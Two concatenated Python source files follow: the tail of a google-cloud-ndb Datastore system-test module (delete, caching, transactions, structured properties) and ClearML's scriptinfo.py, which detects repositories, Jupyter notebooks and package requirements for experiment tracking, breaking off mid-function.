assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert cache_key in cache_dict
assert key.delete() is None
assert cache_key not in cache_dict
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert cache_dict[cache_key][0] == b"0"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_delete_entity_with_redis_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert global_cache.redis.get(cache_key) is not None
assert key.delete() is None
assert global_cache.redis.get(cache_key) is None
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert global_cache.redis.get(cache_key) == b"0"
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
assert key.get().foo == 42 # not deleted until commit
ndb.transaction(delete_entity)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction_then_rollback(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
raise Exception("Spurious error")
with pytest.raises(Exception):
ndb.transaction(delete_entity)
assert key.get().foo == 42
@pytest.mark.usefixtures("client_context")
def test_allocate_ids():
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(5)
assert len(keys) == 5
for key in keys:
assert key.id()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_get_by_id(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
entity = SomeKind.get_by_id(entity_id)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
ds_entity(KIND, name, foo=42)
entity = SomeKind.get_or_insert(name, foo=21)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_insert(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
entity = SomeKind.get_or_insert(name, foo=21)
dispose_of(entity._key._key)
assert entity.foo == 21
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get_in_transaction(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
def do_the_thing():
ds_entity(KIND, name, foo=42)
return SomeKind.get_or_insert(name, foo=21)
entity = ndb.transaction(do_the_thing)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_structured_property(dispose_of):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
def test_insert_entity_with_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
ds_entity = ds_client.get(key._key)
assert ds_entity["foo"] == 42
assert ds_entity["bar.one"] == "hi"
assert ds_entity["bar.two"] == "mom"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND, entity_id, **{"foo": 42, "bar.one": "hi", "bar.two": "mom"}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_repeated_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND,
entity_id,
**{"foo": 42, "bar.one": ["hi", "hello"], "bar.two": ["mom", "dad"]}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "hello"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_insert_expando(dispose_of):
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
entity = SomeKind(foo=42)
entity.expando_prop = "exp-value"
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.expando_prop == "exp-value"
@pytest.mark.usefixtures("client_context")
def test_insert_polymodel(dispose_of):
class Animal(ndb.PolyModel):
one = ndb.StringProperty()
class Feline(Animal):
two = ndb.StringProperty()
class Cat(Feline):
three = ndb.StringProperty()
entity = Cat(one="hello", two="dad", three="i'm in jail")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved, Animal)
assert isinstance(retrieved, Cat)
assert retrieved.one == "hello"
assert retrieved.two == "dad"
assert retrieved.three == "i'm in jail"
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
entity = SomeKind(foo="bar")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.created_at, datetime.datetime)
assert isinstance(retrieved.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_insert_nested_autonow_property(dispose_of):
class OtherKind(ndb.Model):
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
entity = SomeKind(other=OtherKind())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.other.created_at, datetime.datetime)
assert isinstance(retrieved.other.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_uninitialized_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty(required=True)
entity = SomeKind()
with pytest.raises(ndb.exceptions.BadValueError):
entity.put()
@mock.patch(
"google.cloud.ndb._datastore_api.make_call",
mock.Mock(side_effect=Exception("Datastore shouldn't get called.")),
)
def test_crud_without_datastore(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
context.set_datastore_policy(False) # Don't use Datastore
key = ndb.Key(KIND, entity_id)
SomeKind(foo=42, bar="none", baz="night", _key=key).put()
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
key.delete()
assert key.get() is None
|
scriptinfo.py
|
import os
import sys
from copy import copy
from functools import partial
from tempfile import mkstemp
import attr
import logging
import json
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output, remove_user_pass_from_url
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_max_requirements_size = 512 * 1024
_packages_remove_version = ('setuptools', )
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = self._remove_package_versions(
get_installed_pkgs_detail(), self._packages_remove_version)
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3 # noqa: F401
modules.add('boto3', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage # noqa: F401
modules.add('google_cloud_storage', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings # noqa: F401
modules.add('azure_storage_blob', 'clearml.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard # noqa: F401
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard # noqa: F401
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'clearml', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower()
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = None, None
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
else:
name = name.replace('-', '_')
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
if v.version:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
conda_requirements += '{0}\n'.format(k)
except Exception:
conda_requirements = ''
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
except Exception:
forced_packages = {}
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
if v.version:
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
else:
requirements_txt += '# {0}\n'.format(k)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
version = v.version
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e' and version:
requirements_txt += '{0}\n'.format(version)
elif k.startswith('-e '):
requirements_txt += '{0} {1}\n'.format(k.replace('-e ', '', 1), version or '')
elif version:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
else:
requirements_txt += '{0}\n'.format(k)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
if forced_packages[k]:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', forced_packages[k])
else:
requirements_txt += '{0}\n'.format(k)
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
# make sure we do not exceed the size a size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
@staticmethod
def _remove_package_versions(installed_pkgs, package_names_to_remove_version):
installed_pkgs = {k: (v[0], None if str(k) in package_names_to_remove_version else v[1])
for k, v in installed_pkgs.items()}
return installed_pkgs
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from clearml import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
except Exception:
replace_ipython_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
max_diff_size_bytes = 500000
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
cookies = None
password = None
if server_info and server_info.get('password'):
# we need to get the password
from ....config import config
password = config.get('development.jupyter_server_password', '')
if not password:
_logger.warning(
'Password protected Jupyter Notebook server was found! '
'Add `sdk.development.jupyter_server_password=<jupyter_password>` to ~/clearml.conf')
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
r = requests.get(url=server_info['url'] + 'login')
cookies = {'_xsrf': r.cookies.get('_xsrf', '')}
r = requests.post(server_info['url'] + 'login?next', cookies=cookies,
data={'_xsrf': cookies['_xsrf'], 'password': password})
cookies.update(r.cookies)
try:
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
# send request to the jupyter server
try:
r.raise_for_status()
except Exception as ex:
_logger.warning('Failed accessing the jupyter server{}: {}'.format(
' [password={}]'.format(password) if server_info.get('password') else '', ex))
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even oon windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(
str(script_path), str(cls._get_working_dir(repo_root, return_abs=True)))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _cwd(cls):
# return the current working directory (solve for hydra changing it)
# check if running with hydra
if sys.modules.get('hydra'):
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
import hydra
return Path(hydra.utils.get_original_cwd()).absolute()
except Exception:
pass
return Path.cwd().absolute()
@classmethod
def _get_working_dir(cls, repo_root, return_abs=False):
# get the repository working directory (might be different from actual cwd)
repo_root = Path(repo_root).absolute()
cwd = cls._cwd()
try:
# do not change: test if we are under the repo root folder, it will throw an exception if we are not
relative = cwd.relative_to(repo_root).as_posix()
return cwd.as_posix() if return_abs else relative
except ValueError:
# Working directory not under repository root, default to repo root
return repo_root.as_posix() if return_abs else '.'
@classmethod
def _absolute_path(cls, file_path, cwd):
# return the absolute path, relative to a specific working directory (cwd)
file_path = Path(file_path)
if file_path.is_absolute():
return file_path.as_posix()
# Convert to absolute and squash 'path/../folder'
return os.path.abspath((Path(cwd).absolute() / file_path).as_posix())
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepaths, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
cwd = cls._cwd()
scripts_path = [Path(cls._absolute_path(os.path.normpath(f), cwd)) for f in filepaths if f]
if all(not f.is_file() for f in scripts_path):
raise ScriptInfoError(
"Script file {} could not be found".format(scripts_path)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if any(p.exists(d) for d in scripts_dir)), None)
repo_info = DetectionResult()
script_dir = scripts_dir[0]
script_path = scripts_path[0]
messages = []
auxiliary_git_diff = None
if not plugin:
if log:
log.info("No repository found, storing script code instead")
else:
try:
for i, d in enumerate(scripts_dir):
repo_info = plugin.get_info(
str(d), include_diff=check_uncommitted, diff_from_remote=uncommitted_from_remote)
if not repo_info.is_empty():
script_dir = d
script_path = scripts_path[i]
break
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
# make sure diff is not too big:
if len(diff) > cls.max_diff_size_bytes:
messages.append(
"======> WARNING! Git diff to large to store "
"({}kb), skipping uncommitted changes <======".format(len(diff)//1024))
auxiliary_git_diff = diff
diff = '# WARNING! git diff too large to store, clear this section to execute without it.\n' \
'# full git diff available in Artifacts/auxiliary_git_diff\n' \
'# Clear the section before enqueueing Task!\n'
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=remove_user_pass_from_url(repo_info.url),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
# if repo_info.modified:
# messages.append(
# "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
# script_info.get("repository", "")
# )
# )
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages, auxiliary_git_diff=auxiliary_git_diff),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log, uncommitted_from_remote=uncommitted_from_remote)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def is_running_from_module(cls):
# noinspection PyBroadException
try:
return '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']
except Exception:
return False
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if cls.is_running_from_module():
argvs = ''
